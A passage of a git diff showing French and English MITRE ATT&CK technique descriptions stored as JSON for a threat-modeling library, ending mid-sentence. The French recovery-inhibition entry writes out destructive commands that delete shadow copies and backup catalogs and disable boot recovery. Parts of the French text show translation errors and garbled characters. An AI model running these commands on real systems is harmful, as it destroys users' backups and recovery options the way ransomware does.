pour d\u00e9sactiver ou supprimer les fonctionnalit\u00e9s de r\u00e9cup\u00e9ration du syst\u00e8me :* vssadmin.exe peut \u00eatre utilis\u00e9 pour supprimer tous les clich\u00e9s instantan\u00e9s de volume sur un syst\u00e8me - vssadmin.exe supprimer les ombres /all /quiet* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) peut \u00eatre utilis\u00e9 pour supprimer les clich\u00e9s instantan\u00e9s de volume - wmic shadowcopy delete* wbadmin.exe peut \u00eatre utilis\u00e9 pour supprimer le catalogue de sauvegarde Windows - wbadmin.exe supprimer le catalogue -quiet* bcdedit.exe peut \u00eatre utilis\u00e9 pour d\u00e9sactiver les fonctionnalit\u00e9s de r\u00e9cup\u00e9ration automatique de Windows en modifiant les donn\u00e9es de configuration de d\u00e9marrage - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no* REAgentC.exe peut \u00eatre utilis\u00e9 pour d\u00e9sactiver la r\u00e9paration de l\u2019environnement de r\u00e9cup\u00e9ration Windows (WinRE)/ Options de r\u00e9cup\u00e9ration d\u2019un syst\u00e8me infect\u00e9Sur les p\u00e9riph\u00e9riques r\u00e9seau, les adversaires peuvent tirer parti de [Nettoyage du disque](https://attack.mitre.org/techniques/T1561) pour supprimer les images de sauvegarde du microprogramme et reformater le syst\u00e8me de fichiers, puis [Arr\u00eat/Red\u00e9marrage du syst\u00e8me](https://attack.mitre.org/techniques/T1529) pour recharger le p\u00e9riph\u00e9rique. Ensemble, cette activit\u00e9 peut rendre les p\u00e9riph\u00e9riques r\u00e9seau compl\u00e8tement inutilisables et inhiber les op\u00e9rations de r\u00e9cup\u00e9ration. Les adversaires peuvent \u00e9galement supprimer les sauvegardes '\u00c4\u00faonline\u2019\u00c4\u00f9 qui sont connect\u00e9es \u00e0 leur r\u00e9seau', que ce soit via un support de stockage r\u00e9seau ou via des dossiers qui se synchronisent avec les services cloud. (Citation: Sauvegardes ZDNet Ransomware 2020) Dans les environnements cloud, les adversaires peuvent d\u00e9sactiver les strat\u00e9gies de contr\u00f4le de version et de sauvegarde et supprimer des snapshots, des images machine et des versions ant\u00e9rieures d\u2019objets con\u00e7us pour \u00eatre utilis\u00e9s dans des sc\u00e9narios de r\u00e9cup\u00e9ration d\u2019urgence. (Citation : Dark Reading Code Spaces Cyber Attack) (Citation : Rhino Security Labs AWS S3 Ransomware)\nhttps://attack.mitre.org/techniques/T1490\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1216 - Ex\u00e9cution du proxy de script syst\u00e8me", - "description": "Les adversaires peuvent utiliser des scripts approuv\u00e9s, souvent sign\u00e9s avec des certificats, pour mandater l\u2019ex\u00e9cution de fichiers malveillants. Plusieurs scripts sign\u00e9s Microsoft qui ont \u00e9t\u00e9 t\u00e9l\u00e9charg\u00e9s \u00e0 partir de Microsoft ou qui sont par d\u00e9faut sur les installations Windows peuvent \u00eatre utilis\u00e9s pour l\u2019ex\u00e9cution par proxy d\u2019autres fichiers. (R\u00e9f\u00e9rence : Projet LOLBAS) Ce comportement peut \u00eatre abus\u00e9 par des adversaires pour ex\u00e9cuter des fichiers malveillants qui pourraient contourner le contr\u00f4le des applications et la validation des signatures sur les syst\u00e8mes. (Citation: Liste de contournement GitHub Ultimate AppLocker)\nhttps://attack.mitre.org/techniques/T1216\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1211 - Exploitation pour l\u2019\u00e9vasion de la d\u00e9fense", - "description": "Les adversaires peuvent exploiter une vuln\u00e9rabilit\u00e9 du syst\u00e8me ou d\u2019une application pour contourner les fonctions de s\u00e9curit\u00e9. L\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 logicielle se produit lorsqu\u2019un adversaire profite d\u2019une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du syst\u00e8me d\u2019exploitation lui-m\u00eame pour ex\u00e9cuter du code contr\u00f4l\u00e9 par l\u2019adversaire.\u00ac\u2020Des vuln\u00e9rabilit\u00e9s peuvent exister dans les logiciels de s\u00e9curit\u00e9 d\u00e9fensive qui peuvent \u00eatre utilis\u00e9es pour les d\u00e9sactiver ou les contourner. Les adversaires peuvent avoir une connaissance pr\u00e9alable par reconnaissance de l\u2019existence d\u2019un logiciel de s\u00e9curit\u00e9 dans un environnement ou ils peuvent effectuer des v\u00e9rifications pendant ou peu de temps apr\u00e8s que le syst\u00e8me est compromis pour [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). Le logiciel de s\u00e9curit\u00e9 sera probablement cibl\u00e9 directement pour l\u2019exploitation. Il existe des exemples de logiciels antivirus cibl\u00e9s par des groupes de menaces persistantes pour \u00e9viter d\u2019\u00eatre d\u00e9tect\u00e9s.\nhttps://attack.mitre.org/techniques/T1211\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1127 - Ex\u00e9cution du proxy Trusted Developer Utilities", - "description": "Les adversaires peuvent tirer parti des utilitaires de d\u00e9veloppement approuv\u00e9s pour ex\u00e9cuter par proxy des charges utiles malveillantes. Il existe de nombreux utilitaires utilis\u00e9s pour les t\u00e2ches li\u00e9es au d\u00e9veloppement de logiciels qui peuvent \u00eatre utilis\u00e9s pour ex\u00e9cuter du code sous diverses formes afin d\u2019aider au d\u00e9veloppement, au d\u00e9bogage et \u00e0 la r\u00e9tro-ing\u00e9nierie. (Citation : engima0x3 DNX Bypass) (Citation : engima0x3 RCSI Bypass) (Citation: Exploit Monday WinDbg) (Citation: LOLBAS Tracker) Ces utilitaires peuvent souvent \u00eatre sign\u00e9s avec des certificats l\u00e9gitimes qui leur permettent d\u2019ex\u00e9cuter sur un syst\u00e8me et d\u2019ex\u00e9cuter par proxy du code malveillant via un processus approuv\u00e9 qui contourne efficacement les solutions de contr\u00f4le des applications.\nhttps://attack.mitre.org/techniques/T1127\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1529 - Arr\u00eat/red\u00e9marrage du syst\u00e8me", - "description": "Les adversaires peuvent arr\u00eater/red\u00e9marrer les syst\u00e8mes pour interrompre l\u2019acc\u00e8s \u00e0 ces syst\u00e8mes ou aider \u00e0 leur destruction. Les syst\u00e8mes d\u2019exploitation peuvent contenir des commandes pour lancer un arr\u00eat/red\u00e9marrage d\u2019une machine ou d\u2019un p\u00e9riph\u00e9rique r\u00e9seau. Dans certains cas, ces commandes peuvent \u00e9galement \u00eatre utilis\u00e9es pour lancer un arr\u00eat/red\u00e9marrage d\u2019un ordinateur distant ou d\u2019un p\u00e9riph\u00e9rique r\u00e9seau via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (par exemple, reload). (Citation: Microsoft Shutdown octobre 2017) (Citation : alert_TA18_106A) L\u2019arr\u00eat ou le red\u00e9marrage des syst\u00e8mes peut perturber l\u2019acc\u00e8s aux ressources informatiques pour les utilisateurs l\u00e9gitimes tout en entravant la r\u00e9ponse aux incidents et la r\u00e9cup\u00e9ration. Les adversaires peuvent tenter d\u2019arr\u00eater/red\u00e9marrer un syst\u00e8me apr\u00e8s l\u2019avoir impact\u00e9 d\u2019une autre mani\u00e8re, telle que [Nettoyage de la structure du disque](https://attack.mitre.org/techniques/T1561/002) ou [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), afin d\u2019acc\u00e9l\u00e9rer les effets escompt\u00e9s sur la disponibilit\u00e9 du syst\u00e8me. (Citation : Talos Nyetya juin 2017) (Citation : Talos Olympic Destroyer 2018)\nhttps://attack.mitre.org/techniques/T1529\n", - "provider": "MITRE ATT&CK" - } - } - ], - "locale": "fr" -} \ No newline at end of file diff --git a/library/libraries/mitre-techniques.json b/library/libraries/mitre-techniques.json deleted file mode 100644 index 5b33461..0000000 --- a/library/libraries/mitre-techniques.json +++ /dev/null @@ -1,1577 +0,0 @@ -{ - "name": "MITRE ATT&CK v13 - Techniques", - "description": "Main techniques from MITRE ATT&CK v13", - "format_version": "1.0", - "locale": "en", - "copyright": "\nTerms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK\u00ae for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.\n\"\u00a9 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n", - "objects": [ - { - "type": "threat", - "fields": { - "name": "T1047 - Windows Management Instrumentation", - "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)\nhttps://attack.mitre.org/techniques/T1047\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1113 - Screen Capture", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\nhttps://attack.mitre.org/techniques/T1113\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1037 - Boot or Logon Initialization Scripts", - "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.\nhttps://attack.mitre.org/techniques/T1037\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1557 - Adversary-in-the-Middle", - "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\nhttps://attack.mitre.org/techniques/T1557\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1033 - System Owner/User Discovery", - "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)\nhttps://attack.mitre.org/techniques/T1033\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1583 - Acquire Infrastructure", - "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.\nhttps://attack.mitre.org/techniques/T1583\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1613 - Container and Resource Discovery", - "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment\u2019s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary\u2019s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.\nhttps://attack.mitre.org/techniques/T1613\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1592 - Gather Victim Host Information", - "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).\nhttps://attack.mitre.org/techniques/T1592\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1003 - OS Credential Dumping", - "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\nhttps://attack.mitre.org/techniques/T1003\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1129 - Shared Modules", - "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.\nhttps://attack.mitre.org/techniques/T1129\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1602 - Data from Configuration Repository", - "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)\nhttps://attack.mitre.org/techniques/T1602\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1006 - Direct Volume Access", - "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)\nhttps://attack.mitre.org/techniques/T1006\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1014 - Rootkit", - "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)\nhttps://attack.mitre.org/techniques/T1014\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1123 - Audio Capture", - "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.\nhttps://attack.mitre.org/techniques/T1123\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1543 - Create or Modify System Process", - "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)\nhttps://attack.mitre.org/techniques/T1543\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1133 - External Remote Services", - "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)\nhttps://attack.mitre.org/techniques/T1133\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1539 - Steal Web Session Cookie", - "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.\nhttps://attack.mitre.org/techniques/T1539\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1578 - Modify Cloud Compute Infrastructure", - "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)\nhttps://attack.mitre.org/techniques/T1578\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1069 - Permission Groups Discovery", - "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)\nhttps://attack.mitre.org/techniques/T1069\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1114 - Email Collection", - "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.\nhttps://attack.mitre.org/techniques/T1114\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1594 - Search Victim-Owned Websites", - "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).\nhttps://attack.mitre.org/techniques/T1594\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1561 - Disk Wipe", - "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)\nhttps://attack.mitre.org/techniques/T1561\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1615 - Group Policy Discovery", - "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.\nhttps://attack.mitre.org/techniques/T1615\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1025 - Data from Removable Media", - "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.\nhttps://attack.mitre.org/techniques/T1025\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1547 - Boot or Logon Autostart Execution", - "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.\nhttps://attack.mitre.org/techniques/T1547\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1600 - Weaken Encryption", - "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform 